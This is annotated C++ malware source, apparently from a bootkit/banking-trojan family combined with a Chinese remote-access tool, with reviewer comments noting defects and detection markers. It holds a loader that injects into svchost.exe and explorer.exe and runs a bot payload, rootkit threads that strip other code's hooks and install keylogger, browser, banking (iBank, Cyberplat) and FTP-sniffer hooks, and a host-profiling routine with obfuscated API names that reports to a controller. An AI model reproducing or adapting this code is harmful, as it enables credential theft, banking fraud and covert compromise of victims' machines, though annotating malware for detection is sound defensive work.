// Loader-DLL entry routine once the DLL is resident in a user-mode process
// (the caller — thread start or DllMain continuation — is not visible here).
// Flow: sleep 5 s so the host finishes its normal DLL load order, confirm the
// bootkit driver performed this injection, then pick worker threads by the
// hash of the host executable's file name:
//   svchost.exe  -> DbgRptSvchostThread
//   explorer.exe -> DbgRptExplorerThread + ExplorerLoadAndRunBotPlug
// `Arguments` is not used by this body. No return value; every failure path
// simply returns.
// NOTE(review): the fixed 5 s post-injection delay and the two name hashes
// are stable behavioural markers worth keying detections on.
void StartBootkitDll(void* Arguments)
{
	// If Dll loaded by original Bootkit driver we MUST wait some timeout.
	// This happens because by default bootkit driver call DllMain(_, DLL_PROCESS_ATTACH, _)
	// at all.
	// Waiting helps system to load all libraries in default load order. After loading all modules 
	// we can apply GetApi for our reasons.

	DWORD timeout = 5 * 1000;
	
	// (%d with a DWORD is a signed/unsigned format mismatch; harmless at 5000.)
	LDRDBG("StartBootkitDll", "Sleeping %d ms.", timeout);
	pSleep(timeout);
	LDRDBG("StartBootkitDll", "Waking up after %d ms.", timeout);

	DebugReportInit();

	// Determine which process we are running in: full path of the host EXE,
	// reduced to its file name and hashed (the `true` argument presumably
	// selects case-insensitive hashing — confirm against STR::GetHash).
	char Name[MAX_PATH];
	if ((DWORD)pGetModuleFileNameA(NULL, Name, MAX_PATH) == 0) return;

	PCHAR ShortName = File::ExtractFileNameA(Name, false);

	DWORD Hash = STR::GetHash(ShortName, 0, true);


	LDRDBG("StartBootkitDll", "LoaderDll loaded in path='%s' pid=%u...", Name, (DWORD)pGetProcessId() );

	// Guard: do nothing unless the bootkit driver did the injection.
	// (IsDllLoadedByBootkitLoader is evaluated twice — once just for the log line.)
	LDRDBG("StartBootkitDll", "LoaderDll wake up and check IsLoadedByOriginalBootkit=%d", IsDllLoadedByBootkitLoader());
	if (!IsDllLoadedByBootkitLoader())
	{
		LDRDBG("StartBootkitDll", "LoaderDll is NOT loaded by Bootkit loader. Finished.");
		return;
	}

	LDRDBG("StartBootkitDll", "LoaderDll detects original bootkit loading.");
	
	// Precomputed hashes of the target host names (the inline comments are the
	// author's own; the hash function is STR::GetHash above).
	if (Hash == 0x2608DF01 /* svchost.exe */)
	{
		LDRDBG("StartBootkitDll", "LoaderDll loaded in SVCHOST. ");
		StartThread(DbgRptSvchostThread, NULL);
	}
	
	if (Hash == 0x490A0972 /* explorer.exe */)
	{
		LDRDBG("StartBootkitDll", "LoaderDll loaded in EXPLORER. ");
		StartThread(DbgRptExplorerThread, NULL);
		
		// Only in explorer.exe is the payload ("plug") loaded and run, on its own thread.
		LDRDBG("StartBootkitDll", "Starting loading and run plug.");
		StartThread(ExplorerLoadAndRunBotPlug, NULL);
	}
	
	LDRDBG("StartBootkitDll", "finished.");
}
// Routine the kernel-mode component runs inside a newly started process.
// The parameter shape (NormalContext, SystemArgument1, SystemArgument2) is
// that of a user-mode APC normal routine — inferred from the signature only;
// the queuing side is not visible here. SystemArgument1 is the driver
// communication context handed on to the loader thread; NormalContext and
// SystemArgument2 are unused by this body.
// Behaviour: reset the "loaded by bootkit" flag, bail out if no driver
// context was passed, then dispatch on the host EXE name hash:
//   svchost.exe  -> DLLLoader::StartLoaderThread(SystemArgument1)
//   explorer.exe -> StartThread(ExplorerStartProc, SystemArgument1)
VOID WINAPI Start(
	PVOID  NormalContext /* system pointer (unused here) */,
	PUSER_INIT_NOTIFY  SystemArgument1 /* argument that must be kept so the driver can be talked to */,
	PVOID SystemArgument2/* nothing is passed */
	)
{
	ResetBootkitLoaderFlag();
	
	// Start the DLL-loading thread — only if the driver passed a context.
	if (SystemArgument1 == NULL)
		return;


	// Determine which process we are running in (host EXE file name, hashed).
	char Name[MAX_PATH];
	if ((DWORD)pGetModuleFileNameA(NULL, Name, MAX_PATH) == 0) return;

	PCHAR ShortName = File::ExtractFileNameA(Name, false);

	DWORD Hash = STR::GetHash(ShortName, 0, true);

	LDRDBG("BRDS", "LoaderDll loaded ...");

	//// 301_ld: first launch at all (network may not be available here)
	//PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("301_ld"));

	if (Hash == 0x2608DF01 /* svchost.exe */)
	{

		PCHAR CL = (PCHAR)pGetCommandLineA();

		// Log strings below are runtime data and kept verbatim; they read
		// "driver intercepted svchost.exe start" / "svchost.exe command line - %s".
		LDRDBG("BRDS", "Драйвер перехватил запуск процесса svchost.exe ");
		LDRDBG("BRDS", "Командная строка svchost.exe - %s ", CL);

		// The command-line filter (restricting to the "localservice" svchost
		// instance) is commented out, so the loader thread starts in every svchost.exe.
		//if (STR::Pos(CL, "localservice", 0, false) >= 0)
		{
			DLLLoader::StartLoaderThread(SystemArgument1);
		}
	}
	if (Hash == 0x490A0972 /* explorer.exe */)
	{
		// Log string reads "driver intercepted explorer start".
		LDRDBG("BRDS", "Драйвер перехватил запуск эксплорера ");
		StartThread(ExplorerStartProc, SystemArgument1);
	}
}; // NOTE(review): stray ';' after the function body — a harmless empty declaration.
// Thread body executed inside a process this component has been injected into.
// Order matters: first strip hooks other code placed on loaded DLLs, then
// install this component's own hooks, record the host EXE path, and either
// hand off to the banking-specific hook set or report a generic application
// start. `lpData` is unused. Always returns 0.
// NOTE(review): `AppName` (STR::Alloc) is freed only on the fall-through path;
// the two early `return 0`s below leak it.
DWORD WINAPI RootkitThread( LPVOID lpData )
{
    // This thread runs inside the injected process.
	// Remove existing hooks from loaded DLLs (presumably security-product or
	// competing detours — UnhookDlls' scope is not visible here).
	UnhookDlls();


	// Install own hooks. The names suggest ZwResumeThread (follow into child
	// processes) and ZwQueryDirectoryFile (directory-listing filter); bodies
	// are not visible here.
	HookZwResumeThread();	
	HookZwQueryDirectoryFile();

	// Prepare the event payload.
	TEventData Data;
	ClearStruct(Data);

	// Determine the application name (full path of the host EXE).
	PCHAR AppName = STR::Alloc(MAX_PATH);
	if (AppName != NULL && pGetModuleFileNameA(NULL, AppName, MAX_PATH))
		Data.Application = AppName;

	

	// Hook installed when iBank / Cyberplat starts, both the .exe and the web variant.
	#ifdef RuBnkH // compile-time feature flag (looks like the module's include guard)
		if (IbankHooksMain() )		return 0;		// leaks AppName
		//if (HookCyberplatPCMain())	return 0;
	#endif


	if ( IsTrade() )
	{
		return 0;	// leaks AppName
	}
	

	ApplicationStarted(&Data);

	STR::Free(AppName);

	return 0;
}
// Restores the first 10 bytes of every named export of `hModule` to what is on
// disk, undoing inline hooks (detours) placed by other code. The reference
// copy comes from MapBinary() on the module's own file path. Two classes of
// hook are deliberately left in place: the export named "InternetGetCookieExA",
// and any `jmp rel32` (0xE9) whose target lies in ieframe.dll.
// NOTE(review): 32-bit only — pointer arithmetic truncates through (DWORD);
// the single (DWORD_PTR) cast on the name lookup is the one inconsistency.
// NOTE(review): the return of pGetModuleFileNameA is not checked, so on
// failure MapBinary() receives an uninitialised path.
// NOTE(review): MapBinary() is not visible here. pMap+RVA only works if it
// yields an image-layout (SEC_IMAGE-style) mapping, and if it does not apply
// relocations then any export whose first 10 bytes embed an absolute address
// compares unequal when the module was rebased, and the "restore" writes
// un-relocated bytes. Ords[cEntry] is not bounds-checked against
// NumberOfFunctions, and forwarded exports (RVA into the export section) are
// compared as if they were code.
VOID UnhookModuleExports(HMODULE hModule)
{
	CHAR szModuleFileName[MAX_PATH];

	pGetModuleFileNameA(hModule,szModuleFileName,sizeof(szModuleFileName));
	PVOID pMap = MapBinary(szModuleFileName);
	if (pMap)
	{
		// pNtHeaders is only used as an "is a valid PE" check; the export
		// directory itself is located via the loader's helper below.
		PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)pRtlImageNtHeader(hModule);
		if (pNtHeaders)
		{
			DWORD dwExportsSize;
			//PIMAGE_NT_HEADERS pnt = (PIMAGE_NT_HEADERS)(PIMAGE_DOS_HEADER(hModule)->e_lfanew +(PCHAR)hModule);
			//	dwExportsSize = pnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
			/*PIMAGE_EXPORT_DIRECTORY(PCHAR(hModule) + pnt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);//*/
			PIMAGE_EXPORT_DIRECTORY ExportDirectory =(PIMAGE_EXPORT_DIRECTORY)pRtlImageDirectoryEntryToData((PVOID)hModule,TRUE,IMAGE_DIRECTORY_ENTRY_EXPORT,&dwExportsSize);
			if (ExportDirectory && dwExportsSize)
			{

				// Name-ordinal table, function RVA table and name RVA table, all
				// relative to the in-memory image base.
				PUSHORT Ords = (PUSHORT)((DWORD)hModule+ExportDirectory->AddressOfNameOrdinals);
				PULONG EntriesRva = (PULONG)((DWORD)hModule+ExportDirectory->AddressOfFunctions);
				PULONG Names = (PULONG)((DWORD)hModule+ExportDirectory->AddressOfNames);

				// Walk named exports only (NumberOfNames); Ords maps the name
				// index to the function-table index.
				for (ULONG cEntry = 0; cEntry < ExportDirectory->NumberOfNames; cEntry++)
				{
					// Only the first 10 bytes are compared/restored — presumably
					// enough to cover common 5–7 byte detour prologues.
					ULONG StartSize = 10;
					PVOID ApiStart = (PVOID)((DWORD)hModule+EntriesRva[Ords[cEntry]]);          // live, possibly hooked
					PVOID ApiOriginalStart = (PVOID)((DWORD)pMap+EntriesRva[Ords[cEntry]]);     // same RVA in the fresh mapping

					if (m_memcmp(ApiStart,ApiOriginalStart,StartSize))
					{
						BOOL bRestore = TRUE;

					//	DbgPrint("Hook found %s - %08x - %s ...",szModuleFileName,ApiStart,((DWORD_PTR)hModule+Names[cEntry]));

						// Exception 1: leave InternetGetCookieExA hooked, whoever hooked it.
						if (!plstrcmpA((PCHAR)((DWORD_PTR)hModule+Names[cEntry]),"InternetGetCookieExA"))
						{
							bRestore = FALSE;
						}

						// Exception 2: for a relative jmp (E9 rel32) resolve the target
						// and keep the hook if it lands in ieframe.dll.
						if (*(BYTE*)ApiStart == 0xE9)
						{
							PVOID Handler = (PVOID)(*(DWORD*)((DWORD)ApiStart + 1) + (DWORD)ApiStart + 5);
							CHAR FileName[MAX_PATH];

							if (pGetMappedFileNameA(pGetCurrentProcess(),Handler,FileName,RTL_NUMBER_OF(FileName)-1))
							{
								if (!plstrcmpA(pPathFindFileNameA(FileName),"ieframe.dll"))
								{
							//		DbgPrint("Not restored.\n");
									bRestore = FALSE;
								}
							}
						}

						if (bRestore)
						{
							// Written through WriteProcessMemory on the current process
							// rather than memcpy; success or failure is not acted upon.
							ULONG Written;
							if (pWriteProcessMemory(pGetCurrentProcess(),ApiStart,ApiOriginalStart,StartSize,&Written))
							{
							//	DbgPrint("Restored.\n");
							}
							else
							{
							//	DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError());
							}
						}
					}
				}
			}
		}

		// Called through the normal import, unlike the p*-resolved APIs above.
		UnmapViewOfFile(pMap);
	}
}
// Thread body run inside an injected process (second variant of RootkitThread
// in this corpus; this one carries the browser / Java / keylogger dispatch).
// Order: strip foreign hooks, install own ZwResumeThread/ZwQueryDirectoryFile
// hooks, record the host EXE path, then try target-specific hook sets in
// sequence — the first that reports success ends the thread. Browsers raise a
// BrowserStarted event; anything else falls through to FtpSniffer() and a
// generic ApplicationStarted event. `lpData` is unused; always returns 0.
// The #ifdef names look like include guards of the respective modules, i.e.
// a target is compiled in by including its header.
// NOTE(review): `AppName` is freed on the IE, Firefox and fall-through paths
// only; the Opera, Poker, iBank and Cyberplat early returns leak it.
DWORD WINAPI RootkitThread( LPVOID lpData )
{
    // This thread runs inside the injected process.

	// Remove hooks other code placed on loaded DLLs (scope not visible here).
	UnhookDlls();

	// Install own hooks (bodies not visible here).
	HookZwResumeThread();	
	HookZwQueryDirectoryFile();

	// Prepare the event payload.
	TEventData Data;
	ClearStruct(Data);

	// Determine the application name (full path of the host EXE).
	PCHAR AppName = STR::Alloc(MAX_PATH);
	if (AppName != NULL && pGetModuleFileNameA(NULL, AppName, MAX_PATH))
		Data.Application = AppName;

	// HANDLE Thread = pGetCurrentThread();
	// DWORD H = GetPidByThread(Thread);

	// Unconditional hooks: installed in every host regardless of what follows.
	#ifdef	__keylogger_h__
		HookKeyLogger();
	#endif

	#ifdef		__java_h__
		HookJava();
	#endif

	// Opera: no event is raised and AppName is not freed on this path.
	#ifdef		__opera_h__
	if ( HookOpera() )
	{
		return 0;
	}
	#endif
	
    #ifdef InternetExplorerH
	if ( HookInternetExplorer() )
	{
		InternetExplorerStarted(&Data);
		BrowserStarted(&Data);
        STR::Free(AppName);
		return 0;
	}
	#endif


	#ifdef FireFoxH
	if ( HookMozillaFirefox() )
	{
		FireFoxStarted(&Data);

		BrowserStarted(&Data);

		STR::Free(AppName);
		return 0;
	}
    #endif

	// Loads a DLL that allows remote monitoring of the desktop (author's note;
	// IsPoker's body is not visible here).
	#ifdef PokerH
		if (IsPoker()) 	return 0;	// leaks AppName
	#endif

	// Hook installed when iBank / Cyberplat starts, both the .exe and the web variant.
	#ifdef RuBnkH // compile-time feature flag
		if (IbankHooksMain() )		return 0;		// leaks AppName
		if (HookCyberplatPCMain())	return 0;	// leaks AppName
	#endif


	/*if ( IsTrade() )
	{
		return 0;
	}*/

	// Generic path for any other host: FTP credential sniffer, then a plain
	// application-started event.
	FtpSniffer();

	ApplicationStarted(&Data);

	STR::Free(AppName);

	return 0;
}
// Builds a MESSAGEInfo host-profile record and sends it to the controller:
// CPU speed and name (registry), computer and user name, screen size, the
// check-in channel and port, own EXE path, install/persistence mode and the
// detected antivirus (GetVirus()). Every Win32 API is resolved at run time via
// GetProcAddress, with the import name assembled from a per-character char
// array — a stack-string pattern that keeps the names out of the binary's
// string table (detection-relevant: the library names "ADVAPI32.dll",
// "KERNEL32.dll", "USER32.dll" and the registry paths are still cleartext).
// NOTE(review) defects visible in this body:
//  - szbuf[256] is passed to GetModuleFileNameA with size MAX_PATH (260): a
//    host path of 256+ chars overruns the stack buffer by up to 4 bytes.
//  - The first RegOpenKeyExA result is ignored; on failure hKey and dwCpu are
//    used uninitialised (dwCpu then lands in szCpuSpeend).
//  - HrFvD13 is built but the plain literal "RegQueryValueExA" is passed, so
//    that one import name remains a cleartext string.
//  - LoadLibrary/GetProcAddress results are never null-checked before the call.
//  - KEY_ALL_ACCESS is requested for a read-only query; this fails for
//    non-elevated users on HKLM and szCpuInfo is then left unset.
//  - Infomsg is not zeroed (unless MESSAGEInfo's constructor does so — not
//    visible) and the whole struct is sent, so unset bytes carry stack contents.
void CSystemManager::GetSystemInfo()
{
	MESSAGEInfo Infomsg;
	// Collect OS-related information.
	Infomsg.bToken = TOKEN_SYSTEMINFO; 
	//////////////CPU Speed/////////////////
	DWORD dwCpu, dwBufLen;
	HKEY hKey;
	// "HARDWARE\DESCRIPTION\System\CentralProcessor\0" as a stack string.
	char JYvni02[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0'};
	char HrFvD07[] = {'R','e','g','O','p','e','n','K','e','y','E','x','A','\0'};
    RegOpenKeyExAT pRegOpenKeyExA=(RegOpenKeyExAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD07);
	// Return value unchecked — see header note.
	pRegOpenKeyExA( HKEY_LOCAL_MACHINE,
		JYvni02,
		0, KEY_QUERY_VALUE, &hKey );
	dwBufLen = sizeof(DWORD);
	// HrFvD13 is unused: the literal is passed on the next line instead.
	char HrFvD13[] = {'R','e','g','Q','u','e','r','y','V','a','l','u','e','E','x','A','\0'};
	RegQueryValueExAT pRegQueryValueExA=(RegQueryValueExAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"RegQueryValueExA");
	pRegQueryValueExA( hKey, ("~MHz"), NULL, NULL,(LPBYTE)&dwCpu, &dwBufLen);

	char HrFvD06[] = {'R','e','g','C','l','o','s','e','K','e','y','\0'};
	RegCloseKeyT pRegCloseKey=(RegCloseKeyT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD06);
	pRegCloseKey(hKey);

    char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
    wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
	pwsprintfA(Infomsg.szCpuSpeend,("~%u MHz"), dwCpu);
	//Get CPU Info===============================
	// Same key as above, rebuilt (with an extra terminator) for the name query.
	CHAR SubKey[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0','\0'};
//	CHAR SubKey[MAX_PATH]=("HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\0");
	hKey = NULL;
	if(pRegOpenKeyExA(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
	{
		DWORD dwType;
		// Assumes szCpuInfo holds at least 128 bytes — not visible here; a longer
		// ProcessorNameString makes the query fail (return value ignored).
		DWORD dwSize = 128 * sizeof(TCHAR);
		pRegQueryValueExA(hKey,("ProcessorNameString"),NULL,&dwType,(BYTE *)Infomsg.szCpuInfo,&dwSize);
		pRegCloseKey(hKey);	
	}


	//Get Computer & User Name========================
	DWORD dwLen = sizeof(Infomsg.szPcName);

	char CPolQ16[] = {'G','e','t','C','o','m','p','u','t','e','r','N','a','m','e','A','\0'};
	GetComputerNameAT pGetComputerNameA=(GetComputerNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),CPolQ16);
	pGetComputerNameA(Infomsg.szPcName, &dwLen);
/*
	dwLen = sizeof(Infomsg.szUserName);
	GetUserName(Infomsg.szUserName,&dwLen);   // get the current user name
	*/
	// Get the current user name (project helper; GetUserName path above is disabled).
	GetCurrentUserNamet(Infomsg.szUserName);

	//Get Screen Size=================================
	char DYrEN67[] = {'G','e','t','S','y','s','t','e','m','M','e','t','r','i','c','s','\0'};
	GetSystemMetricsT pGetSystemMetrics=(GetSystemMetricsT)GetProcAddress(LoadLibrary("USER32.dll"),DYrEN67);
	pwsprintfA(Infomsg.szScrSize, ("%d * %d"), pGetSystemMetrics(SM_CXSCREEN),pGetSystemMetrics(SM_CYSCREEN));

//	UINT Porst =dwPort[nConnect];
	// Check-in channel label: nConnect selects domain / QQ / web-drive and the
	// matching lpConnects[] entry (both are externally defined; not visible here).
	// The format strings are runtime data and kept verbatim.
	if(nConnect==0)
	    pwsprintfA(Infomsg.LineName,"域名上线:%s",lpConnects[0]);  // domain check-in
	if(nConnect==1)
	    pwsprintfA(Infomsg.LineName,"QQ上线:%s",lpConnects[1]);    // QQ check-in
	if(nConnect==2)
	    pwsprintfA(Infomsg.LineName,"网盘上线:%s",lpConnects[2]);  // web-drive check-in

	pwsprintfA(Infomsg.LinePort,"%d",dwPort[nConnect]);     // check-in port

	char LCoHX03[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','A','\0'};
	GetModuleFileNameAT pGetModuleFileNameA=(GetModuleFileNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),LCoHX03);
	// NOTE(review): 256-byte buffer, 260 (MAX_PATH) passed as its size — overrun on long paths.
	char szbuf[256];
	pGetModuleFileNameA(NULL,szbuf,MAX_PATH);   // path of this executable

	pwsprintfA(Infomsg.Program,"%s",szbuf );   

	// Persistence mode reported to the controller (Installope is external).
	if(Installope==0)  // portable one-off run
	{
	    pwsprintfA(Infomsg.InstallOpen,"%s","(绿色运行)--重启不上线!");     // run mode: no persistence, gone after reboot
	}
	else if(Installope==1)  // started as a service
	{
		pwsprintfA(Infomsg.InstallOpen,"%s","(服务启动)--SYSTEM用户运行!");     // run mode: service, runs as SYSTEM
	}
	else if(Installope==2)  // started directly
	{
		pwsprintfA(Infomsg.InstallOpen,"%s","(直接启动)--当前用户运行!");      // run mode: direct start, current user
	}

	pwsprintfA(Infomsg.szUserVirus,"%s",GetVirus());   // installed antivirus (helper not visible here)


	// Whole struct goes on the wire, including any fields left unset above.
	Send((LPBYTE)&Infomsg, sizeof(MESSAGEInfo));
}